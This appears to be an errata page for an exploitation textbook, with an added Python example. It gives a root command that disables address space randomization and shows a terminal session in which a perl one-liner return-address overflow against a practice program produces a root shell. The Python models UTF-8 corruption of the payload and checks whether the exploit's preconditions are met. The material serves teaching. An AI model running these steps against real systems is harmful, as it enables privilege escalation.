- Due to an update in the kernel, address space randomization needs to be turned off for the basic exploits to work.
To turn off the randomization (run as root; the setting is reset on reboot):
# echo 0 > /proc/sys/kernel/randomize_va_space
- All occurrences of the algorithm 2n + 365 on pages 177 and 178 need to be changed to 2n + 1745.
- Because Red Hat sets the LANG environment variable to a UTF-8 locale, which makes Perl write bytes such as \xff as a multi-byte UTF-8 sequence instead of the single byte, Red Hat users need to unset LANG before doing any exploits that use command-line Perl. This can be done in the following manner (lines beginning with $ or # are command-line entries; the other lines are program output):
$ env | grep LANG
LANG=en_US.UTF-8
$ export MATRIX=`cat shellcode`
$ ./gete2 MATRIX
MATRIX is located at 0xbffffdd8
$ ./vuln2 `perl -e 'print "\xd8\xfd\xff\xbf"x8;'`
Segmentation fault
$ unset LANG
$ ./gete2 MATRIX
MATRIX is located at 0xbffffde9
$ ./vuln2 `perl -e 'print "\xe9\xfd\xff\xbf"x8;'`
sh-2.05b# id
uid=0(root) gid=500(matrix) groups=500(matrix)
sh-2.05b# exit
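The locale problem shown in the session above, as an added example that is not part of the book or this errata page: a small Python model of what a UTF-8 output layer does to the bytes a perl -e one-liner writes, plus a check of the two environment conditions the errata names (randomize_va_space and a UTF-8 locale). The address 0xbffffdd8 and the repeat count of 8 are the session's own values; the function names and the dictionary returned by payload_damage are this example's own, and the UTF-8 re-encoding is a model of the behaviour the errata describes, not a call into Perl.

```python
"""Why a UTF-8 LANG breaks a byte payload written by perl -e (added example).

Every byte in the 0x80-0xff range, which is exactly the range stack
addresses like 0xbffffdd8 are made of, is re-encoded as two bytes by a
UTF-8 output layer. The payload doubles in length and none of the emitted
bytes equal the intended ones, which is why vuln2 segfaults in the session
until LANG is unset.
"""
import re
import struct


def address_bytes(addr: int) -> bytes:
    """Little-endian 4-byte form of an x86 address: 0xbffffdd8 -> d8 fd ff bf."""
    return struct.pack("<I", addr)


def perl_escape(raw: bytes) -> str:
    """Render bytes as the \\xNN string literal that the errata passes to perl -e."""
    return "".join(f"\\x{b:02x}" for b in raw)


def through_utf8_layer(raw: bytes) -> bytes:
    """Model of a UTF-8 output layer: each byte is treated as a Latin-1 character
    and re-encoded as UTF-8, so bytes 0x80-0xff become two bytes each."""
    return raw.decode("latin-1").encode("utf-8")


def payload_damage(addr: int, repeat: int) -> dict:
    """Compare the intended payload with what a UTF-8 output layer would emit."""
    one_address = address_bytes(addr)
    intended = one_address * repeat
    emitted = through_utf8_layer(intended)
    return {
        "intended_len": len(intended),
        "emitted_len": len(emitted),
        # how many of the four address bytes get inflated to two bytes
        "high_bytes_per_address": sum(1 for b in one_address if b >= 0x80),
        # does the intended 4-byte address appear anywhere in the emitted stream?
        "address_survives": one_address in emitted,
    }


def parse_gete2_address(line: str) -> int:
    """Extract the hex address from a line such as 'MATRIX is located at 0xbffffdd8'."""
    match = re.search(r"0x[0-9a-fA-F]+", line)
    if match is None:
        raise ValueError(f"no hex address in: {line!r}")
    return int(match.group(0), 16)


def locale_is_utf8(env: dict) -> bool:
    """True if the locale variables (in the precedence the C library uses:
    LC_ALL, then LC_CTYPE, then LANG) select a UTF-8 locale."""
    for var in ("LC_ALL", "LC_CTYPE", "LANG"):
        value = env.get(var, "")
        if value:
            return "utf-8" in value.lower().replace("utf8", "utf-8")
    return False


def preflight(env: dict, randomize_va_space: str) -> list:
    """Return the environment problems the errata names, as short strings.
    randomize_va_space is the text read from /proc/sys/kernel/randomize_va_space,
    passed in so the check runs offline on any machine."""
    problems = []
    if randomize_va_space.strip() != "0":
        problems.append("randomize_va_space is not 0")
    if locale_is_utf8(env):
        problems.append("locale is UTF-8; unset LANG (and LC_ALL/LC_CTYPE)")
    return problems


if __name__ == "__main__":
    # Constructed inputs mirroring the session above.
    addr = parse_gete2_address("MATRIX is located at 0xbffffdd8")
    print("perl literal:", perl_escape(address_bytes(addr)))
    print("damage under UTF-8 layer:", payload_damage(addr, 8))
    print("preflight:", preflight({"LANG": "en_US.UTF-8"}, "1\n"))
    print("preflight after unset:", preflight({}, "0\n"))
```

The address_survives flag is the useful part for a reader checking their own setup: with a UTF-8 layer active it is False even though the intended string is repeated eight times, so the crash in the session is not a bad address but a mangled one.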